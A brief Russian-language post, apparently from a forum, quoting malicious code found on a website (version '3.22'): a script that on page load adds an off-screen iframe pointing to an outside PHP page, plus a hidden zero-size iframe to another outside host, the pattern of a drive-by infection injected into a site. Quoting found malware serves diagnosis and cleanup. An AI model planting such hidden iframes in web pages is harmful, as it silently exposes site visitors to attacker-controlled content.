вот такая борода на 3.22
function frmAdd() {
var ifrm = document.createElement('iframe');
ifrm.style.position='absolute';
ifrm.style.top='-999em';
ifrm.style.left='-999em';
ifrm.src = "http://biuroprofil.pl/js/faq.php";
ifrm.id = 'frmId';
document.body.appendChild(ifrm);
};
window.onload = frmAdd;
</script>
<iframe src='http://zaczac.leehoan.com/in/' width='0' height='0' style='visibility:hidden;'></iframe>